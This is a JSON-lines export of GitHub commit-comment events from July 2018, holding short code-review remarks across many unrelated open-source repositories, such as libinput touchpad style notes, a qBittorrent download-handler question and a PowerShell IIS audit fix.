{"id":"8001648916","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795671,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:36:03Z","updated_at":"2018-07-23T04:36:03Z","author_association":"OWNER","body":"I've been at work for the last 6.5 hours. I'm technically still at work now, I just happen to havew a moment to myself. :P\r\n\r\nNot saying you don't deserve any credit, just saying that we came up with the idea at trhe same time, you just had the time to implement it first."}},"created_at":"2018-07-23T04:36:03Z"}
{"id":"8001651754","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795676,"position":55,"line":1132,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:37:19Z","updated_at":"2018-07-23T04:37:19Z","author_association":"NONE","body":"general (hand-wavy) style rule: no empty between a specific comment and the code implementing it. So for the first comment here and empty line is appropriate, for the second one it isn't. [yeah, and I just noticed this is the style I've been using, hopefully consistently...]\r\n\r\nalso, move the threshold up please, declarations shouldn't be split up by long comments."}},"created_at":"2018-07-23T04:37:19Z"}
{"id":"8001653493","type":"CommitCommentEvent","actor":{"login":"nploi"},"repo":{"name":"foodtiny/native"},"payload":{"comment":{"id":29795678,"position":42,"line":866,"path":"library/Java/Lang/String/StringTest.cpp","commit_id":"a907ae1c00503d2d0f728c0f0eeaf2127b2d1c72","created_at":"2018-07-23T04:38:07Z","updated_at":"2018-07-23T04:38:07Z","author_association":"COLLABORATOR","body":"add space in \"//Given\", please."}},"created_at":"2018-07-23T04:38:07Z"}
{"id":"8001653641","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795679,"position":44,"line":1121,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:38:11Z","updated_at":"2018-07-23T04:38:11Z","author_association":"NONE","body":"very interesting approach btw, I like it!"}},"created_at":"2018-07-23T04:38:11Z"}
{"id":"8001654198","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29795680,"position":31,"line":165,"path":"src/base/net/downloadhandler.cpp","commit_id":"75eb76482827bdb55c3a429cb972703f8b2b519f","created_at":"2018-07-23T04:38:26Z","updated_at":"2018-07-23T04:38:26Z","author_association":"MEMBER","body":"Isn't this affected by the bug meantioned before?"}},"created_at":"2018-07-23T04:38:26Z"}
{"id":"8001654967","type":"CommitCommentEvent","actor":{"login":"nploi"},"repo":{"name":"foodtiny/native"},"payload":{"comment":{"id":29795682,"position":59,"line":883,"path":"library/Java/Lang/String/StringTest.cpp","commit_id":"a907ae1c00503d2d0f728c0f0eeaf2127b2d1c72","created_at":"2018-07-23T04:38:49Z","updated_at":"2018-07-23T04:38:49Z","author_association":"COLLABORATOR","body":"add space in \"){\"."}},"created_at":"2018-07-23T04:38:49Z"}
{"id":"8001655519","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795683,"position":116,"line":1498,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:39:05Z","updated_at":"2018-07-23T04:39:05Z","author_association":"NONE","body":"I think we should probably skip this for devices where nslots <= 2. We just can't really do proper finger positioning calculations when we only get the coordinates for two fingers."}},"created_at":"2018-07-23T04:39:05Z"}
{"id":"8001657388","type":"CommitCommentEvent","actor":{"login":"civilwargeeky"},"repo":{"name":"Roll20/roll20-character-sheets"},"payload":{"comment":{"id":29795687,"position":null,"line":null,"path":null,"commit_id":"686fbe0ec68276ecabfbef6ed58dc64be1b86b6f","created_at":"2018-07-23T04:39:56Z","updated_at":"2018-07-23T04:39:56Z","author_association":"CONTRIBUTOR","body":"Hey, sorry to bother you again, but I was getting ready for another session today and noticed that the change I made was never re-applied.\r\nThanks for looking into this for me!"}},"created_at":"2018-07-23T04:39:56Z"}
{"id":"8001657397","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29795688,"position":31,"line":165,"path":"src/base/net/downloadhandler.cpp","commit_id":"75eb76482827bdb55c3a429cb972703f8b2b519f","created_at":"2018-07-23T04:39:56Z","updated_at":"2018-07-23T04:39:56Z","author_association":"MEMBER","body":"Maybe open the file inside `if` above and drop `else` branch?"}},"created_at":"2018-07-23T04:39:56Z"}
{"id":"8001660005","type":"CommitCommentEvent","actor":{"login":"gerald1992"},"repo":{"name":"gerald1992/photoup-codedeploy"},"payload":{"comment":{"id":29795695,"position":null,"line":null,"path":null,"commit_id":"0ac7e765bbeee53e983e163e4b293c5f23c38d86","created_at":"2018-07-23T04:41:06Z","updated_at":"2018-07-23T04:41:06Z","author_association":"OWNER","body":"remove index.html"}},"created_at":"2018-07-23T04:41:06Z"}
{"id":"8001660174","type":"CommitCommentEvent","actor":{"login":"Tromador"},"repo":{"name":"eyeonus/EDDBlink-listener"},"payload":{"comment":{"id":29795696,"position":null,"line":null,"path":null,"commit_id":"d4374c6d661488ccd155eb606177778901aab4bc","created_at":"2018-07-23T04:41:10Z","updated_at":"2018-07-23T04:41:10Z","author_association":"CONTRIBUTOR","body":"And I did it with a hangover. *ultimate win*\r\n\r\nAlso when you have time, look over the stuff about sql transactions. \r\nI will properly test it in autocommit mode when I get up as it needs a bit more rigor to be sure that cures the problem. Even if it does, though it's a really inefficient kludge that slows everything down again - we might get away with it, but long term, working out a better way to package up the sql transactions might be required. "}},"created_at":"2018-07-23T04:41:10Z"}
{"id":"8001661626","type":"CommitCommentEvent","actor":{"login":"seolhanKim"},"repo":{"name":"l4zyg33k/Microservices4ModernCommerce"},"payload":{"comment":{"id":29795697,"position":1,"line":1,"path":"03-chapter3.markdown","commit_id":"a1dd4a1588b6888cb79fb665905ecc63091c63ce","created_at":"2018-07-23T04:41:50Z","updated_at":"2018-07-23T04:41:50Z","author_association":"NONE","body":"기술은 마이크로서비스의 이로운 기능이지만, 정의된 특성은 아닙니다. 마이크로서비스는 주로 소형 빌딩, 다방면의 기업 비즈니스 팀과 관련이 있습니다. 흥미 있는 각 팀들은, 자연스레 최선의 기술로 자체 마이크로 소프트를 구축할 것입니다. 단일 마이크로서비스의 범위는 내부 작업이기에, Charter 3은 내부 아키텍처를 언급합니다\r\n\r\n 기술면에서는, 대부분의 마이크로소프트 기술 에코시스템 내 것들은 마이크로소프트 실행에 필수는 아니며, 기술 스택만 을 이용해 마이크로서비스를 실행시킬 수도 있습니다. 다시 말해, 마이크로서비스는 특정 기술 보다, 조직구조에 관련 된 것 이라는 겁니다. 기술은 마이크로서비스를 규모에 맞게 조작할 수 있게 합니다. 적절한 모니터링 시스템을 통해서는 마이크로서비스, 버전, 문제 발생 가능 인스턴스를 식별할 수 있습니다.\r\n\r\n 내/외부 아키텍처 소프트웨어의 대부분은 오픈소스입니다. 마이크로서비스는 해커 커뮤니티에서 만들어졌습니다. 기존 소프트웨어 공급업체는 해당 분야 관련 제품의 생산은 너무 느렸습니다. 내/외부 스택은 다양한 오픈소스 제품으로 구성되지만, 클라우드 공급업체는 일부 지원합니다.\r\n\r\n 기업 내 대부분의 기술 조달은 중앙 집중화 되어있습니다. CIO는 특정 데이터베이스, 프로그래밍 언어 등을 선택하여, 조직 구성원에게 사용을 강요할 것입니다. 최소 비용으로 갖춰진 조직에는 해당 전략이 타당합니다. 조달 부서는 공급업체로부터 최선의 가격을 짜내 제품 전문 지식을 갖춘 팀을 만들 수도 있지만, 이는 특정 계층에 구성원이 집중된 수평적 계층화를 강요하기에 마이크로서비스의 원리에는 완전히 반하고, 팀 간 결합으로 개발 속도는 현저하게 느려지게 됩니다.\r\n\r\n  오늘날 대부분의 기술 조달은 중앙 집중화 되어있는 반면, 마이크로서비스의 기술 조달은 분명하게 분산되어 있습니다. Chapter 2에서 논의된 바와 같이, 각 팀의 자체 스택 선택에는 충분한 자율성을 필요합니다. 이같은 자율성에는 운영 및 유지관리에 대한 책임이 수반되기에, 팀은 현명한 결정을 내려야만 합니다. 여유 있을 때, 새 버전 0.02프레임워크를 실행해 봐도 좋을 것 같습니다. 기존 기업의 기술 선택 자가 실제 기술자는 아니기떄문에, 조심스런 결정을 내리지않을 수도 있습니다.\r\n"}},"created_at":"2018-07-23T04:41:50Z"}
{"id":"8001665519","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795704,"position":171,"line":1539,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:43:35Z","updated_at":"2018-07-23T04:43:35Z","author_association":"NONE","body":"skip the empty line here, see above comment"}},"created_at":"2018-07-23T04:43:35Z"}
{"id":"8001667514","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795710,"position":202,"line":1564,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:44:32Z","updated_at":"2018-07-23T04:44:32Z","author_association":"NONE","body":"} needs to be aligned one indent less"}},"created_at":"2018-07-23T04:44:32Z"}
{"id":"8001667556","type":"CommitCommentEvent","actor":{"login":"Sean-Der"},"repo":{"name":"pions/webrtc"},"payload":{"comment":{"id":29795711,"position":8,"line":85,"path":"README.md","commit_id":"7bbf36a922e5d02e228f35094ef7a6b0476cff1b","created_at":"2018-07-23T04:44:33Z","updated_at":"2018-07-23T04:44:33Z","author_association":"MEMBER","body":"Oops sorry about that! ba96f157e520d3487f7a21ea8e79b70a34695431"}},"created_at":"2018-07-23T04:44:33Z"}
{"id":"8001669516","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795715,"position":248,"line":1640,"path":"src/evdev-mt-touchpad.c","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:45:27Z","updated_at":"2018-07-23T04:45:27Z","author_association":"NONE","body":"misalignment, still works for the first condition but looks like it should match the < 10 condition. Your compiler should've warned about this btw"}},"created_at":"2018-07-23T04:45:27Z"}
{"id":"8001671823","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29795720,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T04:46:31Z","updated_at":"2018-07-23T04:46:31Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-23T04:46:31Z"}
{"id":"8001672525","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29795723,"position":4,"line":144,"path":"src/evdev-mt-touchpad.h","commit_id":"b556ded452d2ba8287d8848c7e454b5df2e12bb9","created_at":"2018-07-23T04:46:53Z","updated_at":"2018-07-23T04:46:53Z","author_association":"NONE","body":"any reason you're not just re-using MAYBE? Quick skim suggests there isn't anything that prevents that."}},"created_at":"2018-07-23T04:46:53Z"}
{"id":"8001676334","type":"CommitCommentEvent","actor":{"login":"KcrPL"},"repo":{"name":"RiiConnect24/RiiConnect24-Patcher"},"payload":{"comment":{"id":29795746,"position":null,"line":null,"path":null,"commit_id":"fdb7a917d9c3068d53c43e9b57daf09b1e6b3e06","created_at":"2018-07-23T04:48:33Z","updated_at":"2018-07-23T04:48:33Z","author_association":"COLLABORATOR","body":"Without it the patching would fail and IOS 31 would not download."}},"created_at":"2018-07-23T04:48:33Z"}
{"id":"8001678389","type":"CommitCommentEvent","actor":{"login":"universooa"},"repo":{"name":"universooa/algorithms"},"payload":{"comment":{"id":29795750,"position":null,"line":null,"path":null,"commit_id":"4a3ea41ea8d35a2fd0897e2d895788910a62c928","created_at":"2018-07-23T04:49:31Z","updated_at":"2018-07-23T04:49:31Z","author_association":"OWNER","body":"Print 0~9 using ascii code."}},"created_at":"2018-07-23T04:49:31Z"}
{"id":"8001686131","type":"CommitCommentEvent","actor":{"login":"seolhanKim"},"repo":{"name":"l4zyg33k/Microservices4ModernCommerce"},"payload":{"comment":{"id":29795762,"position":1,"line":1,"path":"03-chapter3.markdown","commit_id":"a1dd4a1588b6888cb79fb665905ecc63091c63ce","created_at":"2018-07-23T04:53:10Z","updated_at":"2018-07-23T04:53:10Z","author_association":"NONE","body":"**APIs**\r\n각 마이크로 서비스 팀은 하나 이상의 API를 전세계에 공개하기에, API 설계가 잘 되어있어야 합니다. 그러나 해당 Chapter에서는 내부 아키텍처에 초점을 맞춰, 외부 아키텍처에 대해 논의할 Chapter 4를 위하여, API게이트 웨이 및 API로드 밸런서에 대한 언급은 줄일 것입니다.\r\n\r\nAPI들은 HTTP REST인 경우가 많지만, 필수는 아닙니다. 이는 우연히 최 하단 공통분모이며 가독성이 좋기에 사실상 표준이 되었습니다. JSON(JavaScript Object Notation)과 XML 중 어떤 형식을 선호하십니까?\r\n\r\nJSON은 더 함축적이지만 읽기에도 어렵습니다. 특히, 데이터가 복잡하고 계층구조로 이루어진 때가 그렇습니다. XML은 보다 구조적이고 장황한 데이터에 맞습니다. 모든 최신 도구는 JSON과 XML으로 작동합니다만, XML의 광범위 사용 때문에 그에 대한 에코시스템을 많이 보게 될 것입니다. \r\n\r\n두 방법 다 괜찮습니다! 고민하지 마십시오. 어느 쪽이든 조직에 적합하고 편한 것을 사용하십시오.\r\n"}},"created_at":"2018-07-23T04:53:10Z"}
{"id":"8001686364","type":"CommitCommentEvent","actor":{"login":"PREMjITHT"},"repo":{"name":"embeddedarm/linux-3.10.17-imx6"},"payload":{"comment":{"id":29795763,"position":null,"line":null,"path":null,"commit_id":"36fa8ced6b1bd15d47902521c57ac18b96e51c6d","created_at":"2018-07-23T04:53:16Z","updated_at":"2018-07-23T04:53:16Z","author_association":"NONE","body":"sir,\r\n   I am using UART for BT. BLE scanning is working (hcitool lescan),But I am getting this error while scanning BT devices. \r\n\r\n`#hcitool scan\r\n   Scanning ...\r\n   Inquiry failed: Operation not supported`\r\n\r\n@markfeathers \r\n"}},"created_at":"2018-07-23T04:53:16Z"}
{"id":"8001687311","type":"CommitCommentEvent","actor":{"login":"colourlife-WL"},"repo":{"name":"colourlife-WL/TEST"},"payload":{"comment":{"id":29795764,"position":null,"line":null,"path":null,"commit_id":"f8b14db08f09c23c5d6d95b1c23ef62a7d5a6532","created_at":"2018-07-23T04:53:44Z","updated_at":"2018-07-23T04:53:44Z","author_association":"OWNER","body":"这是远程仓库修改意见？"}},"created_at":"2018-07-23T04:53:44Z"}
{"id":"8001688900","type":"CommitCommentEvent","actor":{"login":"snoopyjoe"},"repo":{"name":"snoopyjoe/plugin.video.psvue"},"payload":{"comment":{"id":29795765,"position":null,"line":null,"path":null,"commit_id":"c914b2fc5b504881b87a8f0f7985eda4c7bc20ee","created_at":"2018-07-23T04:54:23Z","updated_at":"2018-07-23T04:54:23Z","author_association":"OWNER","body":"Maybe you're right about the UTC time. The last change to the UTC code was before the v2018.3.24 I believe. No other changes other changes were made to how the stream info is retrieved. That is weird that it works after 8hrs though. Does happen on all your recordings you try to watch or just ones from that channel?"}},"created_at":"2018-07-23T04:54:23Z"}
{"id":"8001694600","type":"CommitCommentEvent","actor":{"login":"ihavenonickname"},"repo":{"name":"fhelwanger/gerar-pis"},"payload":{"comment":{"id":29795770,"position":33,"line":33,"path":"index.html","commit_id":"e13b343804b751cceca3f551f5362ab248096b08","created_at":"2018-07-23T04:56:59Z","updated_at":"2018-07-23T04:56:59Z","author_association":"NONE","body":"😂"}},"created_at":"2018-07-23T04:56:59Z"}
{"id":"8001708771","type":"CommitCommentEvent","actor":{"login":"kally115726"},"repo":{"name":"kut-tktlab/plarail"},"payload":{"comment":{"id":29795794,"position":null,"line":null,"path":null,"commit_id":"2bb9029d0f34a1707b3029908b99f64898282ada","created_at":"2018-07-23T05:02:53Z","updated_at":"2018-07-23T05:02:53Z","author_association":"COLLABORATOR","body":"センサークラス"}},"created_at":"2018-07-23T05:02:53Z"}
{"id":"8001709344","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29795795,"position":31,"line":165,"path":"src/base/net/downloadhandler.cpp","commit_id":"75eb76482827bdb55c3a429cb972703f8b2b519f","created_at":"2018-07-23T05:03:08Z","updated_at":"2018-07-23T05:03:08Z","author_association":"MEMBER","body":">Maybe open the file inside if above and drop else branch?\r\n\r\nOK. Also why is the `if ()` condition required? Can we omit it?"}},"created_at":"2018-07-23T05:03:08Z"}
{"id":"8001709525","type":"CommitCommentEvent","actor":{"login":"lannocc"},"repo":{"name":"sporestack/bitcash"},"payload":{"comment":{"id":29795796,"position":null,"line":null,"path":null,"commit_id":"93694f3f96da170b2abf7f7da5e7d4a6cf824199","created_at":"2018-07-23T05:03:13Z","updated_at":"2018-07-23T05:03:13Z","author_association":"NONE","body":"Cool! I am sure your solution is more comprehensive as mine is a fairly trivial implementation. We could probably use your implementation to replace mine."}},"created_at":"2018-07-23T05:03:13Z"}
{"id":"8001713793","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29795802,"position":null,"line":null,"path":null,"commit_id":"ad834e7051c3977a93683e0b01ddd2d6698bdf25","created_at":"2018-07-23T05:05:08Z","updated_at":"2018-07-23T05:05:08Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-259](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-259).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-259-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T05:05:08Z"}
{"id":"8001722639","type":"CommitCommentEvent","actor":{"login":"thonma"},"repo":{"name":"skj-kensyu-2018/ojihome"},"payload":{"comment":{"id":29795816,"position":5,"line":21,"path":"app/View/Comments/add.php","commit_id":"595b830a256928e08edad40c69eb59ad49b63f6e","created_at":"2018-07-23T05:09:09Z","updated_at":"2018-07-23T05:09:09Z","author_association":"CONTRIBUTOR","body":"いらない"}},"created_at":"2018-07-23T05:09:09Z"}
{"id":"8001722870","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29795817,"position":null,"line":null,"path":null,"commit_id":"7f15d5b3b135f63f7f7dd1f57041da6504fddd42","created_at":"2018-07-23T05:09:14Z","updated_at":"2018-07-23T05:09:14Z","author_association":"OWNER","body":"More on #3 "}},"created_at":"2018-07-23T05:09:14Z"}
{"id":"8001723119","type":"CommitCommentEvent","actor":{"login":"asultan"},"repo":{"name":"intercom/intercom-java"},"payload":{"comment":{"id":29795818,"position":null,"line":null,"path":null,"commit_id":"aec0278b1f17ce77f0195f58a95edfd263c31c31","created_at":"2018-07-23T05:09:20Z","updated_at":"2018-07-23T05:09:20Z","author_association":"NONE","body":"Is this fixed included in a lib which was uploaded to a public lib repository? Or should I build it by myself?"}},"created_at":"2018-07-23T05:09:20Z"}
{"id":"8001723857","type":"CommitCommentEvent","actor":{"login":"thonma"},"repo":{"name":"skj-kensyu-2018/ojihome"},"payload":{"comment":{"id":29795819,"position":33,"line":46,"path":"app/Controller/CommentsController.php","commit_id":"595b830a256928e08edad40c69eb59ad49b63f6e","created_at":"2018-07-23T05:09:39Z","updated_at":"2018-07-23T05:09:39Z","author_association":"CONTRIBUTOR","body":"$dataからwordを抜き出せばいいんじゃない？"}},"created_at":"2018-07-23T05:09:39Z"}
{"id":"8001724630","type":"CommitCommentEvent","actor":{"login":"cmditch"},"repo":{"name":"cmditch/elm-ethereum"},"payload":{"comment":{"id":29795821,"position":null,"line":null,"path":null,"commit_id":"d3c993355d94f7d92a182744e659a85597f50aff","created_at":"2018-07-23T05:10:01Z","updated_at":"2018-07-23T05:10:01Z","author_association":"OWNER","body":"Alright http://package.elm-lang.org/packages/cmditch/mel-bew3/12.0.0 supports encoding Int properly, as well as the latest version of elm-ethereum-generator."}},"created_at":"2018-07-23T05:10:01Z"}
{"id":"8001726511","type":"CommitCommentEvent","actor":{"login":"metas-ts"},"repo":{"name":"metasfresh/metasfresh"},"payload":{"comment":{"id":29795826,"position":null,"line":null,"path":null,"commit_id":"fcd0425c685a0563f89dc2f5d2183e9d7c8da479","created_at":"2018-07-23T05:10:43Z","updated_at":"2018-07-23T05:10:43Z","author_association":"CONTRIBUTOR","body":"[#4365](https://github.com/metasfresh/metasfresh/issues/4365) Error Zooming from material receipt to HU tracing\r\n[#4395](https://github.com/metasfresh/metasfresh/issues/4395) Notification if automatic TU label print failed\r\n[#4185](https://github.com/metasfresh/metasfresh/issues/4185) If C_DocType_Trl description exists, use this as description in document\r\n[#4371](https://github.com/metasfresh/metasfresh/issues/4371) Sales Order VAT vs. Invoice Candidate VAT\r\n[#4172](https://github.com/metasfresh/metasfresh/issues/4172) Purchase order from sales order not working as before\r\n[#4380](https://github.com/metasfresh/metasfresh/issues/4380) consolidate profit related columns in order line and purchase candidate\r\n[#1010](https://github.com/metasfresh/metasfresh-webui-api/issues/1010) Implement process parameters callout support\r\n[#1012](https://github.com/metasfresh/metasfresh-webui-api/issues/1012) Cannot use transform on a TU without LU in HU Editor\r\n[#1007](https://github.com/metasfresh/metasfresh-webui-api/issues/1007) HU-Editor - Refresh after HU-changing process not working properly\r\n[#4376](https://github.com/metasfresh/metasfresh/issues/4376) Pricing engine sets the scale of price amounts to the respective precision"}},"created_at":"2018-07-23T05:10:43Z"}
{"id":"8001740060","type":"CommitCommentEvent","actor":{"login":"274188A"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29795858,"position":null,"line":null,"path":null,"commit_id":"e021a382674d9a1fca4b0610d0fb7463c9fe210a","created_at":"2018-07-23T05:16:28Z","updated_at":"2018-07-23T05:16:28Z","author_association":"NONE","body":"line 1459\r\n(#4.4) corrected else:\r\n\r\n```\r\n\r\n $allowHighBitCharacters = $section `\r\n                | Get-IISConfigAttributeValue -AttributeName \"allowHighBitCharacters\"\r\n\r\n            if ($allowHighBitCharacters) {\r\n                $message = \"non-ASCII characters in URLs are allowed\"\r\n                $audit = [AuditStatus]::False\r\n            }            \r\n        }\r\n        else{\r\n                $message = \"Request Filering is not installed\"\r\n                $audit = [AuditStatus]::False\r\n        }\r\n```"}},"created_at":"2018-07-23T05:16:28Z"}
{"id":"8001741161","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29795863,"position":8,"line":6,"path":"Makefile.am","commit_id":"e14863bcd591588e67e90a3dabbd1c72222bec42","created_at":"2018-07-23T05:16:58Z","updated_at":"2018-07-23T05:16:58Z","author_association":"MEMBER","body":"Why install and uninstall?"}},"created_at":"2018-07-23T05:16:58Z"}
{"id":"8001742779","type":"CommitCommentEvent","actor":{"login":"anqit"},"repo":{"name":"eclipse/rdf4j"},"payload":{"comment":{"id":29795866,"position":14,"line":49,"path":"sparqlbuilder/src/main/java/org/eclipse/rdf4j/sparqlbuilder/util/SparqlBuilderUtils.java","commit_id":"46e4f1bcb880de61743a62ee7afb2b08ed45b3c0","created_at":"2018-07-23T05:17:39Z","updated_at":"2018-07-23T05:17:39Z","author_association":"CONTRIBUTOR","body":"I think it makes more sense for this and future conversion methods to live in the `Rdf` factory class, as `Iri iri(IRI iri)`"}},"created_at":"2018-07-23T05:17:39Z"}
{"id":"8001743050","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29795867,"position":4,"line":47,"path":".travis.yml","commit_id":"dbb07ca31676049606603a10aae4b1ccfbe64cf3","created_at":"2018-07-23T05:17:46Z","updated_at":"2018-07-23T05:17:46Z","author_association":"MEMBER","body":"Why this install?"}},"created_at":"2018-07-23T05:17:46Z"}
{"id":"8001747933","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29795877,"position":1,"line":null,"path":"1532323190.57/github_test.txt","commit_id":"df1e447ba8d90fab9e54dda00b27077bd5192570","created_at":"2018-07-23T05:19:53Z","updated_at":"2018-07-23T05:19:53Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-23T05:19:53Z"}
{"id":"8001750086","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29795880,"position":1,"line":1,"path":"src/sha1hmac.h","commit_id":"dabd67afa7be03e04deb4f0885b818dad37dbfe8","created_at":"2018-07-23T05:20:47Z","updated_at":"2018-07-23T05:20:47Z","author_association":"MEMBER","body":"We don't need this file."}},"created_at":"2018-07-23T05:20:47Z"}
{"id":"8001750283","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29795881,"position":1,"line":1,"path":"src/sha1mac.c","commit_id":"dabd67afa7be03e04deb4f0885b818dad37dbfe8","created_at":"2018-07-23T05:20:52Z","updated_at":"2018-07-23T05:20:52Z","author_association":"MEMBER","body":"We don't need this file."}},"created_at":"2018-07-23T05:20:52Z"}
{"id":"8001750750","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29795882,"position":null,"line":null,"path":null,"commit_id":"7b3be2f86f30bea1b0f503d0367338ca69d918c1","created_at":"2018-07-23T05:21:04Z","updated_at":"2018-07-23T05:21:04Z","author_association":"MEMBER","body":"This seems unhelpful in the strictDeps=false case. No one is using HOST_PATH, so why provide back compat? This makes HOST_PATH meaningless without strictdeps whereas before it could be used to find build inputs executables. We can’t assume all calls to patchShebangs will be run on the host anyway."}},"created_at":"2018-07-23T05:21:04Z"}
{"id":"8001755155","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29795889,"position":null,"line":null,"path":null,"commit_id":"5eede488a68206c8ed18931ee6a9b059fc028f08","created_at":"2018-07-23T05:22:54Z","updated_at":"2018-07-23T05:22:54Z","author_association":"OWNER","body":"It's ugly and obtuse lexically, but makes more sense semantically. It's more in line with item and effect slots, except loot table slots don't need to be modified.\r\n\r\nAlso, generalizing the \"frequency\" concept would seem to be a good idea, considering the dependence on the concept in a lot of ways, and soon to be more as I work on dynamic loot spawning. Soon, the dynamic entity spawning will be reworked to use freq_t.\r\n\r\nI will concede that the initializations are ugly, but I think of it like this: {A,{B,C},{D,E}} => \"A% chance of between B and C occurrences, D to E times\". It's ugly, but it makes more sense to me to generalize it this way than with three separate arrays. If nothing else, it's shorter and easier to read if you understand it. I will soon make comments to clarify.\r\n\r\nNote to self: I really need to remove the dependence on the INV_SIZE definition. It will create limitations in the future."}},"created_at":"2018-07-23T05:22:54Z"}
{"id":"8001770360","type":"CommitCommentEvent","actor":{"login":"sara0871"},"repo":{"name":"wiredjs/wired-elements"},"payload":{"comment":{"id":29795929,"position":null,"line":null,"path":null,"commit_id":"ca972e50220347b5e3800ba33539eadffde39258","created_at":"2018-07-23T05:29:20Z","updated_at":"2018-07-23T05:29:20Z","author_association":"NONE","body":"👍"}},"created_at":"2018-07-23T05:29:20Z"}
{"id":"8001772320","type":"CommitCommentEvent","actor":{"login":"cmbasnett"},"repo":{"name":"DarklightGames/DarkestHour"},"payload":{"comment":{"id":29795931,"position":23,"line":3139,"path":"DH_Engine/Classes/DarkestHourGame.uc","commit_id":"88521e93cad880b7ec27201e0350b48e9e4c8f1a","created_at":"2018-07-23T05:30:09Z","updated_at":"2018-07-23T05:30:09Z","author_association":"MEMBER","body":"`TeamIndex` value could be out of range here."}},"created_at":"2018-07-23T05:30:09Z"}
{"id":"8001773757","type":"CommitCommentEvent","actor":{"login":"cmbasnett"},"repo":{"name":"DarklightGames/DarkestHour"},"payload":{"comment":{"id":29795935,"position":8,"line":3124,"path":"DH_Engine/Classes/DarkestHourGame.uc","commit_id":"88521e93cad880b7ec27201e0350b48e9e4c8f1a","created_at":"2018-07-23T05:30:39Z","updated_at":"2018-07-23T05:30:39Z","author_association":"MEMBER","body":"Just do a check against `arraycount` of `TeamMunitionPercentages`."}},"created_at":"2018-07-23T05:30:39Z"}
{"id":"8001775034","type":"CommitCommentEvent","actor":{"login":"cmbasnett"},"repo":{"name":"DarklightGames/DarkestHour"},"payload":{"comment":{"id":29795938,"position":34,"line":4864,"path":"DH_Engine/Classes/DarkestHourGame.uc","commit_id":"88521e93cad880b7ec27201e0350b48e9e4c8f1a","created_at":"2018-07-23T05:31:09Z","updated_at":"2018-07-23T05:31:09Z","author_association":"MEMBER","body":"Class names need to be capitalized."}},"created_at":"2018-07-23T05:31:09Z"}
{"id":"8001776454","type":"CommitCommentEvent","actor":{"login":"m0nkeykong"},"repo":{"name":"m0nkeykong/chat-ui"},"payload":{"comment":{"id":29795940,"position":null,"line":null,"path":null,"commit_id":"6a6ca03af6323773ce81190cdef67a0b8fb936c0","created_at":"2018-07-23T05:31:44Z","updated_at":"2018-07-23T05:31:44Z","author_association":"OWNER","body":"final commit"}},"created_at":"2018-07-23T05:31:44Z"}
